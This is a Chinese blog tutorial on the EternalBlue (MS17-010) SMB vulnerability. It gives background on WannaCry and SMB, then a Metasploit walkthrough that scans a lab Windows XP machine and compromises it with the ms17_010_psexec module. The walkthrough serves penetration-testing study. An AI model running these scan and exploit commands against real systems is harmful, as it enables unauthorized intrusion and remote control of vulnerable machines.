摘要
什么是永恒之蓝
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
这里说到了SMB协议,那么这又是啥玩意
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
攻击机:192.168.232.131 (Kali安装Metaploit工具)
靶机:192.168.232.128 (windows xp未打永恒之蓝补丁且关闭防火墙)
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
本漏洞需要用到kali自带的Metasploit渗透工具,关于该工具的使用,之后再细讲。
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编 写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。
该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块
(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模
块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模
块。
进入正题,打开我们的kali攻击机,启动我们的Metasploit渗透工具
1 | msfconsole |
打开另一个窗口,扫描一下靶机是否开启了445端口以及查看版本信息
1 | nmap -sV -p 445 192.168.232.128 |
得到靶机的445端口信息,以及系统版本
利用msf的auxiliary模块进行漏洞验证
1 | search ms17-010 |
这里我们可以使用
1 | auxiliary/scanner/smb/smb_ms17_010 |
进行验证是否存在永恒之蓝漏洞
1 | use auxiliary/scanner/smb/smb_ms17_010 |
然后查看具体需要配置的东西
1 | show options |
设置攻击目标及端口
1 | set rhosts 192.168.232.128 |
1 | set rport 445 |
配置完后使用
1 | run |
命令开始测试,发现可以利用该漏洞
现在可以利用攻击模块对其进行渗透,试了多个模块后,得出
1 | exploit/windows/smb/ms17_010_psexec |
该漏洞可用
开始设置靶机的ip,端口以及攻击机的ip
set rhosts 192.168.232.128 set rport 445
配置完输入
1 | run |
进行攻击
这里需要多试几次,可能是玄学吧,成功进入
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!
本文链接:https://www.xy586.top/37884.html
转载请注明文章来源:行云博客 » 永恒之蓝漏洞原理及利用